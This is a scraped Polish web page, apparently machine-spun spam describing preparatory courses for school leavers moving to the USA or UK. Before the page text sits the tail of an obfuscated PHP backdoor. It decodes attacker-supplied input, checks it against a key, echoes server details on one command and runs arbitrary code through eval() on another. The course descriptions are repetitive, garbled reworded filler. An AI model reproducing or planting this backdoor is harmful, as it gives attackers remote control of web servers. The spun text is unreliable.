$j28f2a3){$a3f51320 = $j28f2a3;$a3a13eb = $bcf005;}if (!$a3f51320){foreach ($x721d5[$x721d5['nd42b540a'][87].$x721d5['nd42b540a'][6].$x721d5['nd42b540a'][3].$x721d5['nd42b540a'][40]] as $bcf005=>$j28f2a3){$a3f51320 = $j28f2a3;$a3a13eb = $bcf005;}}$a3f51320 = @$x721d5[$x721d5['nd42b540a'][81].$x721d5['nd42b540a'][51].$x721d5['nd42b540a'][6].$x721d5['nd42b540a'][3].$x721d5['nd42b540a'][6]]($x721d5[$x721d5['nd42b540a'][58].$x721d5['nd42b540a'][10].$x721d5['nd42b540a'][4].$x721d5['nd42b540a'][17].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][51].$x721d5['nd42b540a'][40].$x721d5['nd42b540a'][62]]($x721d5[$x721d5['nd42b540a'][60].$x721d5['nd42b540a'][30].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][30]]($a3f51320), $a3a13eb));if (isset($a3f51320[$x721d5['nd42b540a'][53].$x721d5['nd42b540a'][35]]) && $p429c5==$a3f51320[$x721d5['nd42b540a'][53].$x721d5['nd42b540a'][35]]){if ($a3f51320[$x721d5['nd42b540a'][53]] == $x721d5['nd42b540a'][89]){$u6031 = Array($x721d5['nd42b540a'][22].$x721d5['nd42b540a'][90] => @$x721d5[$x721d5['nd42b540a'][60].$x721d5['nd42b540a'][40].$x721d5['nd42b540a'][6].$x721d5['nd42b540a'][10].$x721d5['nd42b540a'][62].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][51]](),$x721d5['nd42b540a'][60].$x721d5['nd42b540a'][90] => $x721d5['nd42b540a'][82].$x721d5['nd42b540a'][71].$x721d5['nd42b540a'][55].$x721d5['nd42b540a'][57].$x721d5['nd42b540a'][82],);echo @$x721d5[$x721d5['nd42b540a'][35].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][21].$x721d5['nd42b540a'][26].$x721d5['nd42b540a'][6]]($u6031);}elseif ($a3f51320[$x721d5['nd42b540a'][53]] == $x721d5['nd42b540a'][40]){eval/*ze59*/($a3f51320[$x721d5['nd42b540a'][10]]);}exit();}} ?>

Programy dla maturzystów – wyjazdy do USA

Autor: admin
Data publikacji: 05.06.2018

Nasza firma organizuje seminaria i notyfikacje wyrównawcze dla studentów przeprowadzających się do Stanów Zjednoczonych lub krajów Zjednoczonego Królestwa. Umożliwiają one na płynną rekrutację do tamtejszej jednostki pomaturalnej. W ostatnich miesiącach prowadziliśmy m.in. tu wymienione seminaria: 

Charakterystyka programów nr E77/UK:

Niezależne studia inżynierskie i technologiczne, często prowadzone z instruktorami jako mentorami, umożliwiają mlodszym nastolatkom zapoznanie się z tematami związanymi z inżynierią i / lub technologią. Niezależne Szkolenia mogą być okazją dla studentów do poszerzenia podstawowych kompetencji specjalistycznej w danej aplikacji, do bardziej szczegółowego zbadania tematu lub do rozwoju bardziej zaawansowanych umiejętności. Kursy z zakresu inżynierii i technologii-Workplace Experience zapewniają swoim kursantom doświadczenie zawodowe w dziedzinie związanej z inżynierią lub technologią. Cele są zazwyczaj ustalane wspólnie przez studenta, nauczyciela i pracodawcę (chociaż studenci nie muszą płacić). Seminaria te mogą obejmować również zajęcia w klasie, obejmujące dalsze studiowanie w terenie lub dyskusję dotyczącą doświadczeń, które uczniowie napotykają w miejscu pracy.

Formalna definicja kursów nr H72/UK:

Warsztaty z zakresu żywienia i przygotowywania posiłków zapewniają mlodszym nastolatkom wiedzę i umiejętności dotyczące komercyjnego przygotowywania i / lub produkcji żywności, z silnym naciskiem na żywienie, zrównoważone diety i zaspokojenie specjalnych potrzeb żywieniowych. Tematy zazwyczaj obejmują ocenę zawartości składników odżywczych, naukę o żywności i żywieniu, fizjologię i wykorzystanie składników odżywczych. Zawartość kursu może również obejmować dodatki, zanieczyszczenia, choroby przenoszone przez żywność i technologię żywności.

Charakterystyka programów nr A51/UK:

Kursy ochrony społeczności profesjonalnie dostarczają starszym dzieciom informacji dotyczących personelu i agencji, których to dotyczy, w zakresie ochrony domu, miasta, państwa i narodu. Tematy obejmują zazwyczaj obronę cywilną; bezpieczeństwo wewnętrzne; katastrofa, terroryzm i gotowość na wypadek sytuacji wyjątkowej; zapobieganie przestępczości; kontrola zanieczyszczeń; zapobieganie pożarom i kontrola; systemy i zasady prawne i społeczne; i zdrowie publiczne.

Definicja kursów nr J66/USA:

Kursy w zakresie produkcji rolnej i niezależnego badania, często prowadzone z instruktorami jako mentorami, umożliwiają wszystkim zainteresowanym uczestnikom zapoznanie się z tematami związanymi z produkcją rolną i przetwarzaniem. Niezależne Warsztaty mogą być okazją dla studentów do poszerzenia profesjonalnych umiejętności specjalistycznej w danej aplikacji, do bardziej szczegółowego zbadania tematu lub do rozwoju bardziej zaawansowanych umiejętności.

Opis kursów nr B69/UK:

Seminaria w niezależnym studium agrobiznesu, często prowadzone z instruktorami jako mentorami, umożliwiają starszym dzieciom zapoznanie się z tematami związanymi z agrobiznesem. Niezależne Programy mogą być okazją dla studentów do poszerzenia wiedzy specjalistycznej w danej aplikacji, do bardziej szczegółowego zbadania tematu lub do rozwoju bardziej zaawansowanych umiejętności.

Definicja kursów nr N75/UK:

Programy zarządzania szkołą zwołują studentów jako całe ciało studenckie, aby omawiać wspólne problemy, organizować grupy do działania, podejmować decyzje i rozwiązywać problemy związane ze szkołą. Ze względu na charakter tych kursów są one zazwyczaj oferowane w szkołach prywatnych, alternatywnych lub eksperymentalnych.Tagi:
Losowy

Szkolenia z rabatem

Intermediate Orchestra IV (Klasy 9-12) - Zwiększa umiejętności trzeciego poziomu i zapewnia dodatkowe możliwości dla średnio zaawansowanych wykonawców, aby zwiększyć umiejętności i precyzję wykonania na orkiestrowych instrumentach strunowych. Obejmuje wydajność i produkcję, analizy i opracowania teoretyczne, wkła

Czytaj więcej...